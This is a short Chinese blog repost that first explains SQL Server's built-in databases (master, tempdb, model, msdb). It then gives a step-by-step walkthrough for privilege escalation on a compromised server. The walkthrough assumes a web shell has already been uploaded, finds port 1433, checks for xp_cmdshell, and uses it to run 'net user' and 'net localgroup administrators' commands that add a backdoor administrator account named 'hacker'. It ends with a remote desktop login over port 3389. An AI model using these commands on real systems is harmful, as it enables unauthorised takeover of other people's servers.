标签:
1、Master数据库 Master数据库记录了Sqlserver所有的服务器级系统信息,所有的注册帐户和密码,以及所有的系统设置信息,还记录了所有用户定义数据库的存储位置和初始化信息。 2、Tempdb数据库 Tempdb记录了所有的临时表、临时数据和临时创建的存储过程。Tempdb数据库是一个全局资源,没有专门的权限限制,允许所有可以连上Sqlserver服务器的用户使用。 在Tempdb数据库存放的所有数据信息都是临时的。每当连接断开时,所有的临时表和临时存储过程都将自动丢弃。每次系统启动时Sqlserver都会根据Model数据库重新创建Tempdb数据库。 3、Model数据库 Model数据库是用户建立新数据库的模板,它包含了将复制到每个用户数据库中去的系统表。每当创建数据库的语句create database执行时,服务器总是通过复制model数据库来建立新数据库的前面部分,新数据库的后面部分被初始化成空白的数据页,以供用户存放数据。 4、Msdb数据库 Msdb数据库主要被sqlserver agent用来进行复制、作业调度以及管理报警等活动。该数据库常被用来通过调度任务排除故障。 MSSqlservwer xp_cmdshell提权 一、前提上传大马成功后 二、端口扫描,发现有1433端口开放,是mssql数据库 三、连接mssql数据库输入数据库名master以及密码,在sql操作命令行输入“ select count(*)from master.dbo.sysobjects where xtype = ‘x‘ and name = ‘xp_cmdshell‘ ”,查看cmd_shell是否开启,存在则返回1; 四、添加系统账号,在sql操作命令中输入Exec master.dbo.xp_cmdshell ‘net user hacker 123456/add‘,没有回显列表表示成功; 继续输入 Exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add‘ ,将hacker加入管理组; 五、淡季用户账户查看添加的账户;’ 六、scan查看端口号,是否开启3389端口; 七、远程目标主机桌面即可成功;数据库中的一些默认数据库功能以及MSSqlservwer xp_cmdshell提权
标签:
原文地址:http://www.cnblogs.com/zwfc/p/5494825.html
